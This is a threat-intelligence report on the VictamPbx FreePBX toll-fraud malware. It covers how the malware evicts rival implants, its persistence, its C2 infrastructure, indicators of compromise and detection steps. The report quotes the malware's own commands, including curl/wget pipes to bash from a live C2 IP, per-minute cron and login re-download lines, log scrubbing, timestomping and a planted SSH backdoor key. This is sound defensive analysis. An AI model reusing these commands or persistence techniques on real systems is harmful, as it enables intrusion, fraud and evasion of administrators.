The FreePBX Turf War: How VoIP Threat Actors Are Fighting Over Your Phone System
Breakglass Intelligence | 2026-03-15 TLP: WHITE
TL;DR
Seventeen variants of the same FreePBX malware kit -- all named k.php, all approximately 19,499 bytes -- hit our GHOST honeypot sensors between March 14 and March 15, 2026. Each deploys a PHP webshell called VictamPbx for VoIP toll fraud. That part is not new. What is new: the latest variant (SHA256: 4e3ae67c...) contains a full Stage 2 payload that, before installing its own backdoors, systematically hunts and removes the implants of at least seven competing threat actors -- Juba VoIP, Nahda, Badr/b3d0r, nvd0rz, tchTowr, yokyok, and several unnamed groups. It deletes their user accounts, kills their cron jobs, greps webshell directories for rival signature strings and purges matching files, then disables the FreePBX endpoint module to seal the door behind it.
This is not just malware. It is territorial warfare. Multiple organized groups are fighting for exclusive control of the same pool of compromised VoIP phone systems, and VictamPbx is winning by being the most aggressive about evicting competitors.
Why VoIP Systems Are Worth Fighting Over
A compromised PBX is a money printer. The operator can route outbound calls through the victim's SIP trunks to premium-rate international numbers they control. The victim's telco bills them for the calls; the attacker collects revenue share from the premium-rate provider. This is International Revenue Share Fraud (IRSF), and a single hijacked PBX can generate tens of thousands of dollars in fraudulent charges in a weekend.
FreePBX, Elastix, Issabel, and Sangoma are open-source VoIP platforms deployed by hundreds of thousands of businesses worldwide. Many are internet-exposed with default configurations, unpatched admin panels, and the restapps REST API module enabled -- a module that provides unauthenticated remote code execution on vulnerable versions.
The result: a finite pool of exploitable targets and multiple criminal groups competing for the same victims. When one group compromises a PBX, another group often finds the same system later and has to decide what to do about the existing implants. VictamPbx's answer is scorched earth.
The Infection Chain
The VictamPbx kill chain is a four-stage operation. The entry point is the FreePBX restapps REST API, which allows remote code execution on unpatched systems.
Stage 0: k.php -- The Dropper
Despite the .php extension, this is a Bash script. The extension is deliberate -- it blends into FreePBX web directories full of legitimate PHP files and looks unremarkable in Apache access logs.
The dropper base64-decodes a PHP webshell and copies it to twelve or more filesystem paths:
/var/www/html/admin/views/ajax.php
/var/www/html/rest_phones/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php
/var/www/html/phones/ajax.php
/var/www/html/digium_phoness/ajax.php
/var/www/html/fpbxphones/ajax.php
/var/www/html/freepbxphones/ajax.php
/var/www/html/freepbx/ajax.php
It creates missing directories first (mkdir -p), ensuring the webshell deploys even on fresh installs with non-standard configurations. It then drops an .htaccess file with RewriteEngine rules to redirect requests to config.php, providing a fallback access path even if ajax.php filenames are blocked.
Anti-forensics run immediately. Timestamps on the webshell are set to match footer.php (a legitimate FreePBX file), making file-age detection useless:
touch -r /var/www/html/admin/themes/default/views/footer.php \
/var/www/html/admin/views/ajax.php
Apache logs are scrubbed to remove evidence of the restapps entry point:
sed -i '/restapps/d' /var/log/httpd/*
Finally, the dropper writes and executes /tmp/test.sh (Stage 3), which chains into Stage 2.
Stage 1: ajax.php -- The Webshell
The webshell uses double base64 encoding interleaved with randomly generated C-style comments to break pattern matching:
/*nxWXUx1QVDLGG9flBG2QFYBU*/ eval(base64_decode(
/*KoB58L4pQuVnU5*/ "...payload..." /*dummy*/
));
Authentication is MD5-based. The submit button is labeled "VictamPbx" -- actor branding baked into the UI. Once authenticated, the operator gets:
- Full command execution via
system() - Elastix credential theft from the SQLite ACL database at
/var/pubsevcas.wwp - FreePBX admin session hijacking via
paloSantoDB.class.phpandpaloSantoACL.class.php - Asterisk call origination -- a CALL button that executes
asterisk -rx "channel originate Local/00<number>@asterisk-outcalls"to route fraudulent calls through the victim's trunks
An HTML comment embedded in the webshell output contains an IP address -- a different operator IP in each variant, and a persistent OPSEC mistake. More on that later.
Stage 3: license.php -- The Chain Loader
Dropped to /var/www/html/admin/modules/freepbx_ha/license.php, this script fetches and executes Stage 2 from the C2:
curl -s http://45.234.176.202/new/c | bash
wget -qO- http://45.234.176.202/new/c | bash
Both curl and wget are tried for compatibility. This stage also sets up cron persistence and performs log cleanup.
Stage 2: /new/c -- The Turf War
This is where VictamPbx distinguishes itself. The 142-line Stage 2 script, actively served at http://45.234.176.202/new/c at the time of analysis, is as much about eliminating rivals as installing persistence.
The Turf War: Hunting Competitors
Stage 2 opens with a systematic purge of competing threat actors' artifacts. It has detailed knowledge of at least seven rival groups and their specific implant signatures.
Account Removal
The script removes FreePBX admin and OS user accounts belonging to known competitors:
| Removed Account | Associated Actor |
|---|---|
bluej | Unknown group |
nahda | Nahda (Arabic: "renaissance") |
FreePBX_setup | Nahda |
nvd0rz | Unknown |
tchTowr | Unknown |
watch* (wildcard) | Unknown (pattern match) |
ampuser | Unknown |
svc_freepbx | Unknown |
freepbx_svc | Unknown |
juba | Juba VoIP |
The Juba VoIP actor appears to be a significant rival. juba is removed as a system user, and the string JUBAVOIP is one of the webshell signatures targeted for deletion (see below). The Nahda actor (Arabic name suggesting a Middle Eastern group) and the nvd0rz/tchTowr handles suggest at least three distinct competing operations with different regional origins.
Webshell Signature Purge
The script searches all PHP files in FreePBX web directories for strings associated with rival webshells, deleting any file that matches:
| Signature String | Associated Actor |
|---|---|
JUBAVOIP | Juba VoIP |
APlXtygI | Unknown |
hi56q50GYvdi4W | Unknown |
Badr | Badr actor |
b3d0r | Badr actor (variant handle) |
pastebin | Generic stagers using Pastebin for payload hosting |
yokyok | yokyok actor |
bm2cjjnRXac1WW3KT7k6MKTR | Unknown |
This is not guesswork. These are specific artifact strings the VictamPbx operator has collected by studying their competitors' tooling -- likely by encountering it on shared victims. The inclusion of generic pastebin matching is particularly aggressive: it catches any rival who uses Pastebin for payload delivery, even if the specific actor is unknown.
Cron Job Cleanup
Competing cron-based backdoors are removed by deleting FreePBX cron_jobs database entries containing echo or base64 -- common patterns in cron-based dropper persistence but not in legitimate FreePBX cron entries:
# Remove competitor cron persistence from FreePBX database
# Targets entries containing echo/base64 (rival dropper signatures)
Module Disablement
After cleaning house, VictamPbx takes a defensive step: it disables the FreePBX endpoint manager module entirely.
chmod 000 /var/www/html/admin/modules/endpoint
fwconsole ma uninstall endpoint
This is calculated. The endpoint manager is a known attack vector that competitors use. By disabling it, VictamPbx blocks a rival's return path while maintaining its own access through the restapps module and planted webshells. It is locking the door and throwing away the key the competition used, while keeping its own key.
VictamPbx's Own Persistence Arsenal
After clearing the field of rivals, Stage 2 installs its own persistence -- and it is extensive. Five independent mechanisms ensure the operator maintains access even if individual components are discovered and removed.
Backdoor Accounts
FreePBX admin backdoor:
Username: emoadmin
Password: SHA1-hashed value (88a9480df9779df5ad07d5902007c12bd2e2c1a3)
Root-level OS accounts (uid=0, gid=0):
| Username | Password Hash | Notes |
|---|---|---|
| centos | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Blends with CentOS systems |
| admin | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Generic admin |
| support | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Masquerades as support account |
| issabel | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Blends with Issabel PBX |
| sangoma | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Mimics FreePBX vendor name |
| emo | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Actor branding |
| newfpbx | $1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1 | Different hash |
| [random] | $1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1 | 6-char random name |
Every one of these accounts has uid=0. The naming is deliberate -- centos, admin, support, issabel, and sangoma are all names a sysadmin might overlook during an audit because they look like they belong.
SSH Backdoor
An RSA public key is planted in ~/.ssh/authorized_keys for all user home directories:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCRFHF4cGkHU1LHTnjybgIZ9aqNvY1/jj8spnVzz2bE
zYP+g0KanELnJtIZUh9oD3OIU0U8PS48wkEJ44DIsO9bahok9EgCQ15kY0GmOXNcxeyVoBTxxw8cOPl7
HA2sMWUbloSYbL5o/eb5uaO8qAbB7D5tMwpPwsCvXnNFyz5aTsv8BBtm1u3j1ClHaMRvMgtwLt3aB/BE
zQaEJCrEm0G3G4/lb7UxgLc/Kv0UDOxHTrgvLTX199anKRbOraOlHc91mZtgdQJeQhtkoBDD9NQWSuCK
ho0I85IAuM9Yq5vM8psVyO2obTENUeKxOLSiRu8pwJcHkLzGRiB8yemVCyav5MHsqex+ATeZqxn5+Mhn
N6HoNYtPYeppwmRdoUTNUzUTBhUUjS1pmbSckGXzigFHUAqXYbyjpJN/McbzaXxv1EhHu4pSjEweXiT0
Aptp0oGeyWpLLFjLmxUpWLe1W1BKCY8xQhEp3d9FJSG1USlJMH7u/hvdjOmM4y7MaXNocsc= Sangoma
The key comment is "Sangoma" -- the parent company of FreePBX. Any administrator who sees this key might assume it was placed there by the vendor. It was not.
SSH is reconfigured to allow root login (PermitRootLogin yes), and iptables is updated to allow port 22.
Cron Persistence
Two cron jobs re-fetch and execute the dropper every minute:
*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/zen2; \
bash /var/lib/asterisk/bin/zen2
*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; \
bash /var/lib/asterisk/bin/devnull2
The binary names zen2 and devnull2 are chosen to look innocuous in process listings. The per-minute schedule means even if the webshell is removed, the full infection chain re-executes within 60 seconds.
Login and Boot Persistence
# .bash_profile, .bashrc:
(setsid wget "http://45.234.176.202/new/k.php" -O /var/spool/asterisk/tmp/serv \
&& bash /var/spool/asterisk/tmp/serv) &
# /etc/rc.local:
(setsid wget "http://45.234.176.202/new/k.php" -O /var/spool/asterisk/tmp/serv \
&& bash /var/spool/asterisk/tmp/serv) &
Every interactive login and every system boot triggers a fresh download and execution of the dropper. Combined with cron, webshells in 12+ paths, and 8 root accounts with SSH keys, the persistence is near-bulletproof.
Infrastructure and Attribution
The Raza Telefonia Network
All primary C2 infrastructure sits in the 45.234.176.0/22 subnet, owned by AS267369 (MAFREDINE TELECOMUNICACOES EIRELI), a telecom ISP in Salvador, Bahia, Brazil. Three IPs within this range form the operational backbone:
45.234.176.0/22 (AS267369 -- Salvador, Brazil)
|
+-- 45.234.176.202 [PRIMARY C2]
| crm.razatelefonia.pro
| Apache 2.4.56 / Asterisk 13.35.0
| /new/k.php -- Stage 0 dropper
| /new/c -- Stage 2 full compromise
| /panel/ -- "Raza Telefonia" operator panel
|
+-- 45.234.176.67 [PLATFORM INFRASTRUCTURE]
| razatelefonia.pro / workchat.pro
| MySQL 5.7.44 / Redis (unauthenticated) / RabbitMQ
| Portainer 2.27.6 (Docker management)
| Postfix / FTP / IMAP / POP3
|
+-- 45.234.176.204 [SIP GATEWAY]
painel.razatelefonia.pro
SIP on :5060 / WebSocket on :7443
This is where stolen call routes terminate
The C2 itself runs Asterisk 13.35.0 on port 8089. This is a VoIP-native operation: the attackers are running their own PBX infrastructure to terminate fraudulent calls routed through victims. The /panel/ path serves a Portuguese-language login UI branded "Raza Telefonia" -- a management console for what appears to be a toll fraud operation running as a business.
The supporting infrastructure on .67 includes Portainer (Docker orchestration), RabbitMQ (message queuing), Redis, and MySQL -- the backend of an automated fraud platform, not a manual operation.
A Secondary C2 on AWS
A second IP, 3.89.108.204 (AWS us-east-1), appears as an embedded marker in Stage 2 webshells: ((/*3.89.108.204*/)). This likely serves as a secondary staging or tracking endpoint, providing infrastructure redundancy outside the Brazilian subnet.
The Operator IP Leak
Across 17 variants caught by GHOST, we extracted eight distinct operator IPs embedded as HTML comments in the webshell source code. Each variant bakes its operator's current egress IP into the output -- a persistent OPSEC mistake:
| Operator IP | ISP / Location |
|---|---|
85.195.233.39 | Init7/Fiber7, Winterthur, Switzerland |
67.242.60.82 | Charter/Spectrum, US East |
72.218.186.242 | Cox Cable, Hampton Roads, Virginia |
99.144.170.185 | AT&T Residential, Alabama |
73.12.191.36 | Comcast Residential, California |
69.92.177.15 | Unknown US residential |
162.205.106.30 | Houston, Texas |
170.52.1;0.141 | Embedded marker (malformed -- likely internal tracking) |
The Swiss IP (85.195.233.39, Init7) appears in the most variants and is likely a VPN egress. The US residential IPs (AT&T, Comcast, Cox, Spectrum, Comcast) could represent the operator's actual home connections -- or they could be additional proxies. The pattern is consistent with a single operator generating per-batch variants of the toolkit, each time inadvertently stamping their current egress IP into the webshell HTML.
Actor Profile: "Emo"
The actor self-identifies through consistent branding:
- System user
emo(uid=0) on every victim - FreePBX admin account
emoadmin - Webshell submit button labeled "VictamPbx"
- C2 panel branded "Raza Telefonia"
The depp handle appears in related infrastructure (admin.depp.com.br, depp.razatelefonia.pro), possibly a secondary alias.
Campaign Scale
GHOST captured 17 distinct VictamPbx variants between March 14-15, 2026 alone. All share:
- Identical filename:
k.php - Near-identical file size: 19,491-19,499 bytes
- Same C2:
45.234.176.202 - Same deployment paths and persistence mechanisms
- Different webshell authentication hashes and operator IPs per variant
The earliest confirmed C2 activity dates to January 28, 2026 (URLScan.io). A sibling sample with sudo and persistence tags was observed in late January. The razatelefonia.pro domain's certificate transparency logs and the Stage 2 payload's last-modified date of November 25, 2025 suggest the campaign has been running for at least four months.
Detection rates vary wildly across variants: some show 0/72 on VirusTotal (brand new, undetected), while others reach 24/76 with labels like Linux.MulDrop.187 (Dr.Web), HEUR:Trojan-Downloader.Shell.Agent.bc (Kaspersky), and Linux/Agent.OG (ESET). The rapid variant generation appears designed to stay ahead of signature-based detection.
| SHA256 (truncated) | First Seen (UTC) | VT Score |
|---|---|---|
4e3ae67cf9bb... | 2026-03-15 02:34 | N/A |
9aab893007c7... | 2026-03-14 20:16 | 0/0 |
c424cef8ade7... | 2026-03-14 19:59 | Quota |
4dd9d9953ffa... | 2026-03-15 03:15 | N/A |
8821b1819b59... | 2026-03-15 07:43 | N/A |
3b4c85d2e412... | 2026-03-15 08:16 | N/A |
07adbfa4138c... | 2026-03-14 03:33 | 24/76 |
0b6568e67e45... | 2026-03-14 05:16 | 19/76 |
0f335a8feef7... | 2026-03-15 12:08 | 0/72 |
751c9590219f... | 2026-03-14 02:44 | 23/76 |
82aaa56441fc... | 2026-03-14 20:32 | N/A |
94f0212ea304... | 2026-03-15 07:41 | N/A |
a948603c6a98... | 2026-03-14 21:44 | N/A |
d05fecfdf187... | 2026-03-14 08:50 | 18/76 |
d416f76290f5... | 2026-03-15 15:45 | N/A |
ddad63744f93... | N/A | N/A |
3c5dac409eb2... | 2026-03-15 09:16 | N/A |
The Bigger Picture: Who Else Is in This Fight?
The competitor removal list in Stage 2 is essentially an intelligence report on the FreePBX threat landscape. Here is what we can infer about each group:
Juba VoIP -- Uses the system user juba and the webshell signature JUBAVOIP. Previously documented FreePBX-targeting actor. VictamPbx treats them as a primary rival, targeting both their user accounts and webshell files.
Nahda -- Arabic for "renaissance." Uses nahda and FreePBX_setup as user accounts. The Arabic name and naming conventions suggest a Middle Eastern origin. Operating in the same exploit space as the Brazilian VictamPbx group.
Badr/b3d0r -- "Badr" is an Arabic name. Uses both Badr and b3d0r as webshell signature strings, suggesting either two naming conventions for the same tool or a variant/fork. Likely the same actor or closely related to the Nahda group based on naming patterns.
yokyok -- Uses yokyok as a webshell signature. No further attribution available.
nvd0rz / tchTowr -- Hacker-style handles used as OS usernames on compromised PBXes. No further attribution.
Generic stagers -- The pastebin signature catch-all targets any actor using Pastebin for payload delivery, a common technique among lower-sophistication operators.
The ecosystem picture is striking: Brazilian VoIP fraud operators, Arabic-named groups (likely Middle Eastern), and various unattributed actors are all independently discovering, exploiting, and fighting over the same internet-exposed FreePBX installations worldwide. VictamPbx's approach -- total competitor eviction followed by redundant persistence -- is the most operationally mature.
Indicators of Compromise
File Hashes (Stage 0 Dropper)
| SHA256 | MD5 |
|---|---|
4e3ae67cf9bbce30e3ada000d1b03b58d503bc9b55c360a1fb34445915f364ab | 61e26bf2ad8eb5bf8e222852603824fb |
9aab893007c7dc97f98539b4a468bd978a6db7dff17a28fa9173e42252e8be55 | 6441aaa80cd62852eeb419c32ceb2fac |
c424cef8ade79dab30ad4e6b688ac8bb7c5099ebea863e072d7a745db0b58e88 | 5e4c2751374eac2e48b85eaa34d4f3ab |
4dd9d9953ffac418546a28e23d52ccc8c92d863f0495c8980070457088f94297 | 7367d0e845d84727026a9c4170377917 |
8821b1819b5923e403f74dc10ec5a5c8c747ac03ad69f295bbfd6e8a6db86b58 | b79ab227419f86206847456ebdef8adb |
3b4c85d2e41273f33e8d6aff06ddf4b75a242a85d65ecd6207b321c9fd8722b5 | 5ca6709547122f51ecea48565e506e76 |
07adbfa4138c9afc8a974c815eeb17f3d6ef9479881bdbbcba4439d26d96bfd0 | 34deee0d6adb320910d583325e844342 |
0b6568e67e4545d2ed31b91a09fd8768d8241321c13f9acc06f38ff1a3f91f53 | 057a4d214929df3aad6b5ce79f3e4cd9 |
0f335a8feef756b240a6290108c74c69be1c8caae34725c5c66ef8066276310e | 2d3d79cad563f00dae9330bc5425bc4b |
751c9590219f90c83abcd37d32f8c3c24af2b634d83ed8f55f800d38e8a00c7f | 9f29901cb5d351c47726dcb59941770f |
82aaa56441fcb4ca4495c0f2e03eb8fe44df801abeb0aa0d4341d176fbd799ec | e8b718d265aae790dfc6b8e0c3ac0209 |
94f0212ea3040dd579837c12f2dd03de4424f5f9648f4af95505930b8961e200 | b664e5cba4e5d75feb04e071fc54ba7b |
a948603c6a98efe282053a11422765c2771444be9aa2c90d6c5447744aff0985 | dc99867f12cb56f2213f39c55416545a |
d05fecfdf187e28b21ac5e5df5659f10a5e5a23eeb638440ca93789c721a9d5a | bf93b64f89338ae6e1f345d5fdf75f85 |
d416f76290f56c503d16f8db41a5eb6c6702495b1397a5b431eb0a089582321e | f6be9053fc562c6d5c58487178c09bcc |
ddad63744f93537d16b00da6612fcde0a33e71818429096e83a7bbffe7ae6f38 | f3bf285ca4634797fb63b05b9cb8dc23 |
3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f | b345f289e4ca2a61dbd894cfaffa45c8 |
Network Indicators
| IP | Role | ASN / Location |
|---|---|---|
45.234.176.202 | Primary C2 / payload host | AS267369, Salvador, Brazil |
45.234.176.67 | Platform infrastructure (Docker/Redis/MQ) | AS267369, Salvador, Brazil |
45.234.176.204 | SIP termination gateway | AS267369, Salvador, Brazil |
3.89.108.204 | Secondary C2 / tracking marker | AWS us-east-1 |
Domains
| Domain | Role |
|---|---|
crm.razatelefonia.pro | Primary C2 hostname |
razatelefonia.pro | Apex domain |
painel.razatelefonia.pro | SIP gateway panel |
depp.razatelefonia.pro | Related infrastructure |
megabahia.razatelefonia.pro | Related infrastructure |
mail.razatelefonia.pro | Mail server |
oratotext.razatelefonia.pro | Related infrastructure |
workchat.pro | Communication platform |
cadastro.workchat.pro | Registration portal |
admin.depp.com.br | Admin panel |
URLs
| URL | Description |
|---|---|
http://45.234.176.202/new/k.php | Stage 0 dropper |
http://45.234.176.202/new/c | Stage 2 full compromise script |
http://45.234.176.202/panel/ | Operator campaign panel |
Webshell Authentication Hashes
| MD5 Hash | Webshell Variant |
|---|---|
81087680ab58db407450771e3515e09a | Stage 1 ("VictamPbx" button) |
d6e08cf66c4e2c48bd74db31cf697615 | Stage 2 ("Ask" button) |
14fb2b803eecb167bff68fe150c3f0fa | Variant |
66b68782ed9c39c5b69e5813d9c170ce | Variant |
SSH Backdoor Key Fingerprint
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCRFHF4cGkHU1LHTnjybgIZ...Sangoma
Key comment: Sangoma (masquerades as vendor key)
Filesystem Paths to Check
/var/www/html/admin/views/ajax.php
/var/www/html/admin/views/.htaccess
/var/www/html/rest_phones/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/modules/freepbx_ha/license.php
/var/www/html/ajax.php
/var/www/html/h.php
/var/lib/asterisk/bin/zen2
/var/lib/asterisk/bin/devnull
/var/lib/asterisk/bin/devnull2
/var/lib/asterisk/bin/devnull23
/var/spool/asterisk/tmp/serv
Backdoor Account Names to Audit
emoadmin (FreePBX), centos, admin, support, issabel, sangoma, emo, newfpbx
sugarmaint, spamfilter, asteriskuser, supports, freepbxuser, supermaint
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| Exploit Public-Facing Application | T1190 | FreePBX restapps REST API RCE |
| Web Shell | T1505.003 | ajax.php deployed to 12+ paths |
| Unix Shell | T1059.004 | All stages are Bash scripts |
| Cron | T1053.003 | Per-minute dropper re-execution |
| Create Local Account | T1136.001 | 8 root-level accounts + FreePBX admin |
| SSH Authorized Keys | T1098.004 | RSA key planted in all home dirs |
| Clear System Logs | T1070.002 | sed removes restapps from Apache logs |
| Timestomp | T1070.006 | Webshell timestamps forged to match footer.php |
| Match Legitimate Name | T1036.005 | Accounts named centos/sangoma, key labeled "Sangoma" |
| Ingress Tool Transfer | T1105 | wget/curl fetch stages from C2 |
| Valid Accounts | T1078 | emoadmin provides persistent FreePBX access |
| Disable or Modify Tools | T1562.001 | FreePBX endpoint module disabled |
| Resource Hijacking | T1496 | Victim SIP trunks used for toll fraud |
| Credentials from Password Stores | T1555 | Elastix SQLite ACL database harvested |
Detection and Response
If you run FreePBX, Elastix, Issabel, or any Asterisk-based PBX:
- Check for uid=0 accounts other than root in
/etc/passwd. Look for: centos, admin, support, issabel, sangoma, emo, newfpbx. - Audit all
authorized_keysfiles for the "Sangoma" SSH key. - Search crontabs for entries containing
45.234.176.202,zen2,devnull, ork.php. - Scan web directories for
ajax.phpin non-standard locations, particularly in phone provisioning paths. - Block the entire
45.234.176.0/22subnet at the firewall. Block3.89.108.204. - Disable the
restappsmodule if you are not actively using it:fwconsole ma disable restapps. - Review Asterisk CDRs for unauthorized outbound calls to international premium-rate numbers.
- Check
.bash_profile,.bashrc, and/etc/rc.localfor wget commands fetching from external IPs.
The per-minute cron persistence means partial cleanup is ineffective. If you find any of these indicators, assume full compromise and rebuild.
Analysis: GHOST automated threat intelligence | Breakglass Intelligence 17 samples analyzed | Investigation IDs: k-4e3ae67c (primary), k-9aab8930, k-c424cef8, k-4dd9d995, k-8821b181, k-3b4c85d2, and 11 additional variants